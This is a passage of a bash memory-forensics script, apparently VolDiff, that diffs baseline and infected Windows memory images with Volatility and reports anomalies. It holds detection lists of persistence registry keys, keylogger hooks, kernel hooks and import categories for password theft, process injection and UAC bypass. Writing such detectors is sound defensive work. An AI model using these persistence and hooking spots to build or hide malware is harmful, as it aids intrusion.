    if [[ -s $output_dir/tmpfolder/execs.tmp ]] ; then
      echo -e "\n\nNew executables (dlllist)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/execs.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight alternate data stream files:
    cat $output_dir/mftparser/diff-mftparser.txt | grep "DATA ADS" > $output_dir/tmpfolder/ads.tmp
    if [[ -s $output_dir/tmpfolder/ads.tmp ]]; then
      echo -e "\n\nNew alternate Data Stream (ADS) files." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ads.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - MISC ################################

    # find interresting new entries in hosts file
    mkdir $output_dir/tmpfolder/hostsb
    mkdir $output_dir/tmpfolder/hostsi
    qaddressb=$(cat $output_dir/filescan/baseline-filescan.txt | grep -i -E "etc\\\\hosts$" | tr -s ' ' | cut -d ' ' -f 1)
    if [[ ! -z "$qaddressb" ]] ; then 
      vol.py --profile=$profile -f $baseline_memory_image dumpfiles -Q $qaddressb -D $output_dir/tmpfolder/hostsb --name &> /dev/null 
      strings $output_dir/tmpfolder/hostsb/* > $output_dir/tmpfolder/hosts_baseline.tmp  &> /dev/null
    fi
    qaddressi=$(cat $output_dir/filescan/infected-filescan.txt | grep -i -E "etc\\\\hosts$" | tr -s ' ' | cut -d ' ' -f 1)
    if [[ ! -z "$qaddressi" ]] ; then 
      vol.py --profile=$profile -f $infected_memory_image dumpfiles -Q $qaddressi -D $output_dir/tmpfolder/hostsi --name &> /dev/null 
      strings $output_dir/tmpfolder/hostsi/* > $output_dir/tmpfolder/hosts_infected.tmp  &> /dev/null
    fi
    if [[ -s $output_dir/tmpfolder/hosts_baseline.tmp ]] && [[ -s $output_dir/tmpfolder/hosts_infected.tmp ]] ; then
      diff $output_dir/tmpfolder/hosts_baseline.tmp $output_dir/tmpfolder/hosts_infected.tmp | grep -E "^>" | sed 's/^..//' &> $output_dir/tmpfolder/new-hosts.tmp
      if [[ -s $output_dir/tmpfolder/new-hosts.tmp ]] ; then
        echo -e "\n\nChanges in hosts files." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/tmpfolder/new-hosts.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi
    
    # find suspicious new desktop instances: 
    cat $output_dir/deskscan/diff-deskscan.txt | grep "Desktop:" >> $output_dir/tmpfolder/deskscan.tmp
    if [[ -s $output_dir/tmpfolder/deskscan.tmp ]] ; then
      echo -e "\n\nNew desktop instances." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/deskscan.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
            echo -e "\nHint: Use wintree to view a tree of the windows in suspicious desktops." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    ################################ MALWARE CHECKS - PERSISTENCE ################################

    echo -e "Searching for persistence artifacts..."

    # filtering svcscan results:
    cat $output_dir/svcscan/baseline-svcscan.txt | grep -i "Binary Path" | sort | uniq > $output_dir/tmpfolder/baseline-svcscan.tmp
    cat $output_dir/svcscan/infected-svcscan.txt | grep -i "Binary Path" | sort | uniq > $output_dir/tmpfolder/infected-svcscan.tmp
    diff $output_dir/tmpfolder/baseline-svcscan.tmp $output_dir/tmpfolder/infected-svcscan.tmp | grep -E "^>" | sed 's/^..//' > $output_dir/tmpfolder/diff-svcscan.tmp
    if [[ -s $output_dir/tmpfolder/diff-svcscan.tmp ]] ; then
      echo -e "\n\nNew services." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/diff-svcscan.tmp | sed 's,\\,\\\\\\\\,g' > $output_dir/tmpfolder/loop-svcscan.tmp
      while read line ; do 
        cat $output_dir/svcscan/infected-svcscan.txt | grep -B 9 "`echo $line`" >> $output_dir/tmpfolder/malware-checks.tmp
      done < $output_dir/tmpfolder/loop-svcscan.tmp
    fi

    # find changes in registry keys commonly used for persistence:
    for key in "Microsoft\Windows\CurrentVersion\RunOnce" "Microsoft\Windows\CurrentVersion\Run" "Software\Microsoft\Windows\CurrentVersion\RunOnce" "Software\Microsoft\Windows\CurrentVersion\Run" "Microsoft\Windows\CurrentVersion\RunServices" "Microsoft\Windows\CurrentVersion\RunServicesOnce" "Software\Microsoft\Windows NT\CurrentVersion\Winlogon" "Microsoft\Security Center\Svc" ; do
      vol.py --profile=$profile -f $baseline_memory_image printkey -K $key &> $output_dir/tmpfolder/base.tmp &
      vol.py --profile=$profile -f $infected_memory_image printkey -K $key &> $output_dir/tmpfolder/inf.tmp &
      wait
      tr < $output_dir/tmpfolder/base.tmp -d '\000' > $output_dir/tmpfolder/baseline.tmp
      tr < $output_dir/tmpfolder/inf.tmp -d '\000' > $output_dir/tmpfolder/infected.tmp
      diff $output_dir/tmpfolder/baseline.tmp $output_dir/tmpfolder/infected.tmp | grep -E "^>" | sed 's/^..//' &> $output_dir/tmpfolder/diff.tmp
      if [[ -s $output_dir/tmpfolder/diff.tmp ]] ; then
        echo -e "\n\nRegistry key $key changed." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        tail -n +2 $output_dir/tmpfolder/infected.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    ################################ MALWARE CHECKS - KERNEL ################################

    # find keylogger traces in messagehooks:
    cat $output_dir/messagehooks/diff-messagehooks.txt | grep -i "KEYBOARD" > $output_dir/tmpfolder/keyboard_messagehooks.tmp
    if [[ -s $output_dir/tmpfolder/keyboard_messagehooks.tmp ]]; then
      echo -e "\n\nKeylogger traces (messagehooks)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/messagehooks/infected-messagehooks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/messagehooks/infected-messagehooks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/keyboard_messagehooks.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unusual new timers:
    cat $output_dir/timers/diff-timers.txt | grep -E -v -i "ataport.SYS|ntoskrnl.exe|NETIO.SYS|storport.sys|afd.sys|cng.sys|dfsc.sys|discache.sys|HTTP.sys|luafv.sys|ndis.sys|Ntfs.sys|rdbss.sys|rdyboost.sys|spsys.sys|srvnet.sys|srv.sys|tcpip.sys|usbccgp.sys" | sort | uniq >> $output_dir/tmpfolder/timers.tmp
    if [[ -s $output_dir/tmpfolder/timers.tmp ]] ; then
      echo -e "\n\nNew timers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/timers/infected-timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/timers/infected-timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/timers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: Malware can set kernel timers to run functions at specified intervals." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # find unusual new gditimers:
    cat $output_dir/gditimers/diff-gditimers.txt | grep -E -v -i "dllhost.exe|explorer.exe|csrss.exe" | sort | uniq >> $output_dir/tmpfolder/gditimers.tmp
    if [[ -s $output_dir/tmpfolder/gditimers.tmp ]] ; then
      echo -e "\n\nNew gditimers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/gditimers/infected-gditimers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/gditimers/infected-gditimers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/gditimers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: Malware can set timers to run functions at specified intervals." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # find malicious kernel timers:
    cat $output_dir/timers/diff-timers.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_timers.tmp
    if [[ -s $output_dir/tmpfolder/unknown_timers.tmp ]]; then
      echo -e "\n\nNew malicious kernel timers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/timers/infected-timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/timers/infected-timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_timers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find malicious kernel callbacks:
    cat $output_dir/callbacks/diff-callbacks.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_callbacks.tmp
    if [[ -s $output_dir/tmpfolder/unknown_callbacks.tmp ]]; then
      echo -e "\n\nNew malicious kernel callbacks." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/callbacks/infected-callbacks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/callbacks/infected-callbacks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_callbacks.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unknown drivermodule entries:
    cat $output_dir/drivermodule/diff-drivermodule.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_drivermodule.tmp
    if [[ -s $output_dir/tmpfolder/unknown_drivermodule.tmp ]]; then
      echo -e "\n\nNew suspicious drivermodule entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/drivermodule/infected-drivermodule.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/drivermodule/infected-drivermodule.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_drivermodule.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unknown driverirp entries:
    cat $output_dir/driverirp/diff-driverirp.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_driverirp.tmp
    if [[ -s $output_dir/tmpfolder/unknown_driverirp.tmp ]]; then
      echo -e "\n\nNew suspicious driverirp entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_driverirp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find hooked ssdt functions:
    cat $output_dir/ssdt/diff-ssdt.txt | grep -i -E -v '(ntos|win32k)' | grep -i "Entry" > $output_dir/tmpfolder/hooked_ssdt.tmp
    if [[ -s $output_dir/tmpfolder/hooked_ssdt.tmp ]]; then
      echo -e "\n\nNew hooked ssdt functions." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/hooked_ssdt.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find manipulated idt entries:
    cat $output_dir/idt/diff-idt.txt | grep -i "rsrc" > $output_dir/tmpfolder/manipulated_idt.tmp
    if [[ -s $output_dir/tmpfolder/manipulated_idt.tmp ]]; then
      echo -e "\n\nManipulated idt entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/idt/infected-idt.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/idt/infected-idt.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/manipulated_idt.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # display orphan threads:
    cat $output_dir/orphanthreads/diff-orphanthreads.txt > $output_dir/tmpfolder/orphanthreads.tmp
    if [[ -s $output_dir/tmpfolder/orphanthreads.tmp ]]; then
      echo -e "\n\nOrphan threads." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/orphanthreads.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - STRINGS ################################

    echo -e "Hunting for badness in memory strings..."
    # dumping and analysing registry for anomalies
    mkdir $output_dir/dumpregistry
    mkdir $output_dir/tmpfolder/baselineregistry
    mkdir $output_dir/dumpregistry/infectedregistry
    vol.py --profile=$profile -f $baseline_memory_image dumpregistry -D $output_dir/tmpfolder/baselineregistry &> /dev/null &
    vol.py --profile=$profile -f $infected_memory_image dumpregistry -D $output_dir/dumpregistry/infectedregistry &> /dev/null &
    wait
    strings -a -td $output_dir/tmpfolder/baselineregistry/* | sort | uniq > $output_dir/tmpfolder/baseline-registry-strings.txt
    strings -a -td $output_dir/dumpregistry/infectedregistry/* | sort | uniq > $output_dir/tmpfolder/infected-registry-strings.txt
    diff $output_dir/tmpfolder/baseline-registry-strings.txt $output_dir/tmpfolder/infected-registry-strings.txt | grep -E "^>" | sed 's/^..//' &> $output_dir/dumpregistry/diff-registry-strings.txt
    # find ips/domains/emails in new registry strings:
    cat $output_dir/dumpregistry/diff-registry-strings.txt | grep -o -E '\b(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' | uniq >> $output_dir/tmpfolder/diff-reg-ip-domains.tmp
    cat $output_dir/dumpregistry/diff-registry-strings.txt | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | uniq >> $output_dir/tmpfolder/diff-reg-ip-domains.tmp
    cat $output_dir/dumpregistry/diff-registry-strings.txt | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | uniq >> $output_dir/tmpfolder/diff-reg-ip-domains.tmp
    if [[ -s $output_dir/tmpfolder/diff-reg-ip-domains.tmp ]] ; then
      echo -e "\n\nNew IPs, domains and email addresses found in registry." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/diff-reg-ip-domains.tmp | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
    fi
    # find other suspicious strings in registry:
    for pattern in Web Antivirus Virtualisation Sandbox Sysinternals Shell Keylogger Filepath Password Powershell Infogathering Executable Banking Encryption Socialsites Other ; do
      if [[ $pattern == "Web" ]] ; then regex_str=$web_regex_str ; fi
      if [[ $pattern == "Antivirus" ]] ; then regex_str=$antivirus_regex_str ; fi
      if [[ $pattern == "Virtualisation" ]] ; then regex_str=$virtualisation_regex_str ; fi
      if [[ $pattern == "Sandbox" ]] ; then regex_str=$sandbox_regex_str ; fi
      if [[ $pattern == "Sysinternals" ]] ; then regex_str=$sysinternals_regex_str ; fi
      if [[ $pattern == "Shell" ]] ; then regex_str=$shell_regex_str ; fi
      if [[ $pattern == "Keylogger" ]] ; then regex_str=$keylogger_regex_str ; fi
      if [[ $pattern == "Filepath" ]] ; then regex_str=$filepath_regex_str ; fi
      if [[ $pattern == "Password" ]] ; then regex_str=$password_regex_str ; fi
      if [[ $pattern == "Powershell" ]] ; then regex_str=$powershell_regex_str ; fi
      if [[ $pattern == "Infogathering" ]] ; then regex_str=$infogathering_regex_str ; fi
      if [[ $pattern == "Executable" ]] ; then regex_str=$exec_regex_str ; fi
      if [[ $pattern == "Banking" ]] ; then regex_str=$banking_regex_str ; fi
      if [[ $pattern == "Encryption" ]] ; then regex_str=$crypto_regex_str ; fi
      if [[ $pattern == "Socialsites" ]] ; then regex_str=$socialsites_regex_str ; fi
      if [[ $pattern == "Other" ]] ; then regex_str=$other_regex_str ; fi

      if grep -E -i $regex_str $output_dir/dumpregistry/diff-registry-strings.txt > /dev/null ; then
        echo -e "\n\n$pattern strings found in registry." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        grep -E -i $regex_str $output_dir/dumpregistry/diff-registry-strings.txt | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    # running volatility strings plugin
    mkdir $output_dir/strings
    strings -a -td $output_dir/malfind/dump-dir-infected/* > $output_dir/tmpfolder/process-strings.tmp 2> /dev/null
    strings -a -td $output_dir/procdump/* >> $output_dir/tmpfolder/process-strings.tmp 2> /dev/null
    vol.py --profile=$profile -f $infected_memory_image strings -S --string-file=$output_dir/tmpfolder/process-strings.tmp &> $output_dir/strings/process-strings-vol.txt

    # find ips/domains/emails in strings:
    cat $output_dir/strings/process-strings-vol.txt | grep -E '\b(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' | uniq >> $output_dir/tmpfolder/infected-ip-domains.tmp
    cat $output_dir/strings/process-strings-vol.txt | grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | uniq >> $output_dir/tmpfolder/infected-ip-domains.tmp
    cat $output_dir/strings/process-strings-vol.txt | grep -E "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | uniq >> $output_dir/tmpfolder/infected-ip-domains.tmp
    if [[ -s $output_dir/tmpfolder/infected-ip-domains.tmp ]] ; then
      echo -e "\n\nNew IPs, domains and email addresses found in memory strings." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/infected-ip-domains.tmp | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
    fi
    
    # find other suspicious strings in memory:
    for pattern in Web Antivirus Virtualisation Sandbox Sysinternals Shell Keylogger Filepath Password Powershell Infogathering Executable Banking Encryption Socialsites Other ; do
      if [[ $pattern == "Web" ]] ; then regex_str=$web_regex_str ; fi
      if [[ $pattern == "Antivirus" ]] ; then regex_str=$antivirus_regex_str ; fi
      if [[ $pattern == "Virtualisation" ]] ; then regex_str=$virtualisation_regex_str ; fi
      if [[ $pattern == "Sandbox" ]] ; then regex_str=$sandbox_regex_str ; fi
      if [[ $pattern == "Sysinternals" ]] ; then regex_str=$sysinternals_regex_str ; fi
      if [[ $pattern == "Shell" ]] ; then regex_str=$shell_regex_str ; fi
      if [[ $pattern == "Keylogger" ]] ; then regex_str=$keylogger_regex_str ; fi
      if [[ $pattern == "Filepath" ]] ; then regex_str=$filepath_regex_str ; fi
      if [[ $pattern == "Password" ]] ; then regex_str=$password_regex_str ; fi
      if [[ $pattern == "Powershell" ]] ; then regex_str=$powershell_regex_str ; fi
      if [[ $pattern == "Infogathering" ]] ; then regex_str=$infogathering_regex_str ; fi
      if [[ $pattern == "Executable" ]] ; then regex_str=$exec_regex_str ; fi
      if [[ $pattern == "Banking" ]] ; then regex_str=$banking_regex_str ; fi
      if [[ $pattern == "Encryption" ]] ; then regex_str=$crypto_regex_str ; fi
      if [[ $pattern == "Socialsites" ]] ; then regex_str=$socialsites_regex_str ; fi
      if [[ $pattern == "Other" ]] ; then regex_str=$other_regex_str ; fi

      if grep -E -i $regex_str $output_dir/strings/process-strings-vol.txt > /dev/null ; then
        echo -e "\n\n$pattern strings found in memory." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        grep -E -i $regex_str $output_dir/strings/process-strings-vol.txt | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    ################################ MALWARE CHECKS - IMPORTS ################################

    # analyse import tables in new processes:
    plugin=impscan
    tail -n +4 $output_dir/psscan/diff-psscan.txt | tr -s ' ' | cut -d " " -f 3 | sort | uniq > $output_dir/tmpfolder/procids.tmp
    cat $output_dir/malfind/diff-malfind.txt | grep "Address:" | cut -d ' ' -f 4 | sort | uniq >> $output_dir/tmpfolder/procids.tmp
    cat $output_dir/tmpfolder/procids.tmp | sort | uniq > $output_dir/tmpfolder/pids.tmp
    while read pid; do
      vol.py --profile=$profile -f $memory_image $plugin -p $pid &> $output_dir/tmpfolder/$pid-imports.tmp
      process=`tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 1-3 | grep -i " "$pid | cut -d ' ' -f 2 | sort | uniq`
      # searching for anti debug import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $anti_debug_imports > $output_dir/tmpfolder/$pid-imports-susp.tmp
      # search for password extraction import functions 
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $password_extract_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for web request import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $web_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for service import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $service_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for process injection import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $process_injection_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for uac bypass import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $uac_bypass_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for misc import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $misc_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      if [[ -s $output_dir/tmpfolder/$pid-imports-susp.tmp ]] ; then
        echo -e "\n\nSuspicious imports in process $process." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '2p' $output_dir/tmpfolder/$pid-imports.tmp >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '3p' $output_dir/tmpfolder/$pid-imports.tmp >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/tmpfolder/$pid-imports-susp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done < $output_dir/tmpfolder/pids.tmp

  fi

  ################################ REPORT CREATION ################################
  if [[ $@ =~ "--no-report" ]] ; then
    endtime=$(date +%s)
    echo -e "\nAll done in $(($endtime - $starttime)) seconds."
    rm -r $output_dir/tmpfolder &> /dev/null
    notify-send "VolDiff execution completed."
    exit
  fi
  echo -e "Creating a report..."
  report=VolDiff-report.txt
  touch $output_dir/$report
  echo -e " _    __      ______  _ ________" >> $output_dir/$report
  echo -e "| |  / /___  / / __ \(_) __/ __/" >> $output_dir/$report
  echo -e "| | / / __ \/ / / / / / /_/ /_  " >> $output_dir/$report
  echo -e "| |/ / /_/ / / /_/ / / __/ __/  " >> $output_dir/$report
  echo -e "|___/\____/_/_____/_/_/ /_/     " >> $output_dir/$report
  echo -e "\nVolatility analysis report generated by VolDiff v$version." >> $output_dir/$report 
  echo -e "Download the latest VolDiff version from https://github.com/aim4r/VolDiff/.\n" >> $output_dir/$report
  echo -e "Baseline memory image: $baseline_memory_image" >> $output_dir/$report 
  echo -e "Infected memory image: $infected_memory_image" >> $output_dir/$report 
  echo -e "Profile: $profile" >> $output_dir/$report 
  touch $output_dir/tmpfolder/no_new_entries.tmp
  for plugin in "{plugins_to_report[@]}"
  do
    if [[ -s $output_dir/$plugin/diff-$plugin.txt ]] ; then  
      # processing pslist and psscan output:
      if [[ $plugin = "pslist"  ]] || [[ $plugin = "psscan"  ]] ; then
       echo -e "\n\nNew $plugin entries." >> $output_dir/$report
       echo -e "===========================================================================\n" >> $output_dir/$report
       sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
       sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
       cat $output_dir/$plugin/baseline-$plugin.txt | tr -s ' ' | cut -d " " -f 3 > $output_dir/tmpfolder/baseline-pids.tmp
       cat $output_dir/$plugin/infected-$plugin.txt | tr -s ' ' | cut -d " " -f 3  > $output_dir/tmpfolder/infected-pids.tmp
       diff $output_dir/tmpfolder/baseline-pids.tmp $output_dir/tmpfolder/infected-pids.tmp | grep -E "^>" | sed 's/^..//' | uniq &>> $output_dir/tmpfolder/unique-new-pids.tmp
       while read pid; do
         cat $output_dir/$plugin/infected-$plugin.txt | grep -E "[a-zA-Z] +$pid " >> $output_dir/$report
       done < $output_dir/tmpfolder/unique-new-pids.tmp

      #processing netscan output
      elif [[ $plugin = "netscan"  ]] ; then
        echo -e "\n\nNew $plugin entries." >> $output_dir/$report
        echo -e "===========================================================================\n" >> $output_dir/$report
        sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report
      #filtering mutantscan output
      elif [[ $plugin = "mutantscan"  ]] ; then
        echo -e "\n\nNew $plugin entries." >> $output_dir/$report
        echo -e "===========================================================================" >> $output_dir/$report
        cat $output_dir/$plugin/diff-$plugin.txt | tr -s ' ' | cut -d ' ' -f 6 | sort | uniq >> $output_dir/$report
        if [[ $@ =~ "--add-hints" ]] ; then
          echo -e "\nHint: Google mutants associated with suspicious processes." >> $output_dir/$report
        fi

      # processing plugins that don't need output formatting:
      elif [[ $plugin = "devicetree" ]] || [[ $plugin = "orphanthreads" ]] || [[ $plugin = "cmdline" ]] || [[ $plugin = "consoles" ]] || [[ $plugin = "svcscan" ]] || [[ $plugin = "driverirp" ]] || [[ $plugin = "malfind" ]] || [[ $plugin = "shellbags" ]] || [[ $plugin = "iehistory" ]] || [[ $plugin = "sessions" ]] || [[ $plugin = "eventhooks" ]] ; then
        echo -e "\n\nNew $plugin entries." >> $output_dir/$report
        echo -e "===========================================================================\n" >> $output_dir/$report
        cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report

      # processing other plugins:
      else
        echo -e "\n\nNew $plugin entries." >> $output_dir/$report
        echo -e "===========================================================================\n" >> $output_dir/$report
        sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report
      fi
      # adding hints to help in further analysis:
      if [[ $@ =~ "--add-hints" ]] ; then
        if [[ $plugin = "malfind" ]] ; then
          echo -e "\nHint: Suspicious malfind processes were dumped to disk, and can be reversed as normal or uploaded to VirusTotal." >> $output_dir/$report
        fi
        if [[ $plugin = "drivermodule" ]] ; then
          echo -e "\nHint: Use moddump -b to dump suspicious drivers from memory to disk." >> $output_dir/$report
        fi
        if [[ $plugin = "driverscan" ]] ; then
          echo -e "\nHint: Drivers that have no associated service should be considered as suspicious. Use moddump -b to dump suspicious drivers from memory to disk." >> $output_dir/$report
        fi
        if [[ $plugin = "psxview" ]] ; then
          echo -e "\nHint: Use procexedump to dump suspcious processes from memory to disk." >> $output_dir/$report
        fi
        if [[ $plugin = "netscan" ]] ; then
          echo -e "\nHint: Translate suspicious IPs to domains using Google/VirusTotal, and search for the associated domains in memory strings." >> $output_dir/$report
        fi
        if [[ $plugin = "ssdt" ]] ; then
          echo -e "\nHint: Some rootkits manipulate SSDT entries to hide its files or registry entries from usermode." >> $output_dir/$report
        fi
        if [[ $plugin = "iehistory" ]] ; then
          echo -e "\nHint: iehistory can reveal history details of malware that uses the WinINet API." >> $output_dir/$report
        fi
        if [[ $plugin = "envars" ]] ; then
          echo -e "\nHint: Some malware will change the PATH and PATHEXT environment variables." >> $output_dir/$report
        fi
        if [[ $plugin = "messagehooks" ]] ; then
          echo -e "\nHint: messagehooks can detect hooks that attempt to catch user strokes." >> $output_dir/$report
        fi
      fi
    else
      echo -e "$plugin" >> $output_dir/tmpfolder/no_new_entries.tmp 
    fi
  done

  # display list of plugins with no notable changes:
  if [[ -s $output_dir/tmpfolder/no_new_entries.tmp ]]; then
    echo -e "\n\nNo notable changes to highlight from the following plugins." >> $output_dir/$report
    echo -e "===========================================================================\n" >> $output_dir/$report
    cat $output_dir/tmpfolder/no_new_entries.tmp >> $output_dir/$report
  fi

  # display list of plugins hidden from report (verbose):
  echo -e "\n\nPlugins that were executed but are not included in the report above." >> $output_dir/$report
  echo -e "===========================================================================\n" >> $output_dir/$report
  echo -e "filescan\nhandles\ngetsids\ndeskscan\ndlllist\nldrmodules\natoms\nsvcscan\natomscan\nidt\ngdt\ntimers\ngditimers" >> $output_dir/$report

  # add identified process anomalies to the report:
  if [[ $@ =~ "--malware-checks" ]] ; then
    if [[ -s $output_dir/tmpfolder/malware-checks.tmp ]]; then
      echo -e "" >> $output_dir/$report
      echo "   _               _           _         __                 _ _       " >> $output_dir/$report
      echo "  /_\  _ __   __ _| |_   _ ___(_)___    /__\ ___  ___ _   _| | |_ ___ " >> $output_dir/$report
